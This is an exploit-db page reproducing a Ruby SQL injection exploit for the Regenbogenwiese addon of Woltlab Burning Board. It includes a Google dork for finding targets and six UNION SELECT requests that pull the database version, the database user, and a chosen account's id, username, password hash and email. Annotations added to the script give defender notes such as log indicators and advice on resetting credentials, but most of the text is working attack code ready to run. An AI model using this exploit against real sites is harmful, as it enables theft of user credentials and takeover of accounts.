Woltlab Burning Board Regenbogenwiese 2007 Addon – SQL Injection

  • 作者: Easy Laster
    日期: 2013-10-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/29023/
  • # Exploit Title: Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection Exploit
    # Google Dork: inurl:regenbogenwiese.php wbb (and more)
    # Date: 04.09.2013
    # Exploit Author: Easy Laster
    # Software Name: Regenbogenwiese v1.5 © 2007 by DieKrabbe
    # Version: 1.5
    # Tested on: Windows 8/Backtrack
    #
    
    #!/usr/bin/ruby
    #secunet.cc
    #30.07.2013
    #regenbogenwiese.php?kategorie='+union+select
    #+1,1,1,1,1,1,concat(database(),0x3a,user(),0x
    #3a,userid,0x3a,password,0x3a,username,0x3a,em
    #ail),1,1,1,1,1,1,1,1+bb1_users+where+userid=1--+
    #Vulnerability discovered by Easy Laster
    # Interactive proof-of-concept for the SQL injection in the `kategorie`
    # parameter of regenbogenwiese.php (Regenbogenwiese addon for Woltlab
    # Burning Board). It reads a host, a script path and a user id from stdin,
    # sends six plain-HTTP GET requests that each carry a UNION SELECT against
    # bb1_users, and prints the value found between '~' markers in each response.
    #
    # Defender notes:
    # - Root cause is inferred from the payload (the addon source is not shown):
    #   `kategorie` appears to reach a quoted SQL string unescaped. The fix on
    #   the addon side is a bound parameter or strict validation of the value;
    #   where the addon cannot be patched, it should be removed.
    # - Log indicators visible in this script: requests to regenbogenwiese.php
    #   whose query string contains `union+select`, `concat(0x27,0x7e,0x27`,
    #   `bb1_users` and a trailing `--+`.
    # - Data read: database version and user, plus userid, username, password
    #   hash and email of the chosen account. If such requests show up in the
    #   logs, treat those values as disclosed and reset the credentials.
    print "
    ################################################################
    #secunet.cc#
    ################################################################
    #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
    #Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection#
    # (regenbogenwiese.php, kategorie param) #
    #Exploit #
    # Using Host+Path+id #
    #www.demo.de + /wbb/ + or + / + 1#
    # Easy Laster#
    #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
    ################################################################
    "
    # Net::HTTP is the only dependency; no request headers are set anywhere
    # below, so the requests go out with the library defaults.
    require 'net/http'
    # Separator line reused between the prompts and before the footer.
    block = "################################################################"
    print ""+ block +""
    # The three values below are read from stdin and used verbatim: none is
    # validated or URL-encoded before being concatenated into the request path.
    print "\nEnter Target Name (site.com)->"
    host=gets.chomp
    print ""+ block +""
    print "\nEnter Script Path (/wbb/ or /)->"
    path=gets.chomp
    print ""+ block +""
    print "\nEnter The ID From User (id)->"
    userid=gets.chomp
    print ""+ block +""
    # Everything from here to the footer runs inside one begin/rescue. Any
    # StandardError (a connection failure, or calling [1] on the nil returned
    # by match when the markers are absent from the response) ends the run
    # with the generic failure message.
    begin
    # Request 1: version(). In every request the seventh of fifteen UNION
    # columns is concat(0x27,0x7e,0x27,<expr>,0x27,0x7e,0x27), i.e. the value
    # wrapped as '~'<value>'~' so the regex below can find it in the page body.
    dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat(0x27,0x7e,"+
     "0x27,version(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+where+userid="+
     ""+ userid +"--+"
     # Port 80 is hard-coded; the connection is plain HTTP, not TLS.
     http = Net::HTTP.new(host, 80)
     resp= http.get(path+dir)
     # Capture group 1 is whatever sits between the first '~' marker and the
     # last one on the same line (`.+` is greedy and does not cross newlines).
     print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1]
    
    # Request 2: user(), the account the application uses to reach the database.
    dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+
    "at(0x27,0x7e,0x27,user(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users"+
    "+where+userid="+ userid +"--+"
    http = Net::HTTP.new(host, 80)
    resp= http.get(path+dir)
    print "\nDatabase User-> "+(/'~'(.+)'~'/).match(resp.body)[1]
    
     # Request 3: the userid column of the selected bb1_users row.
     dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+
     "(0x27,0x7e,0x27,userid,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+wh"+
     "ere+userid="+ userid +"--+"
     http = Net::HTTP.new(host, 80)
     resp= http.get(path+dir)
     print "\nID Account-> "+(/'~'(.+)'~'/).match(resp.body)[1]
    
     # Request 4: the username column.
     dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+
     "(0x27,0x7e,0x27,username,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+
     "here+userid="+ userid +"--+"
     http = Net::HTTP.new(host, 80)
     resp= http.get(path+dir)
     print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
    
    # Request 5: the password column. The output label calls it MD5; that is
    # the author's claim and is not verifiable from this script. If accurate,
    # the hash is weak against offline guessing, so an affected account needs
    # a password reset rather than monitoring alone.
    dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+
    "(0x27,0x7e,0x27,password,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+
    "here+userid="+ userid +"--+"
    http = Net::HTTP.new(host, 80)
    resp= http.get(path+dir)
    print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1]
    
     # Request 6: the email column.
     dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+
     "at(0x27,0x7e,0x27,email,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+"+
     "where+userid="+ userid +"--+"
     http = Net::HTTP.new(host, 80)
     resp= http.get(path+dir)
     print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
    print "\n" 
    print ""+ block +""
     print "\n"
     # Footer banner, printed only when all six requests produced a match.
     print "
    ################################################################
    #Greetings #
    ################################################################
    -#------------------------+ | |#---------------------+
    -#------------------------+_|_|_ #---------------------+
    -#------------------------+(o o) #---------------------+
    -#------------------------+ooO--(_)--Ooo-#---------------------+
    ################################################################
     "
     # Bare rescue: catches StandardError and discards the exception, so the
     # message below does not distinguish a network error from a response
     # that lacked the markers.
     rescue
    print "\nExploit Failed"
    end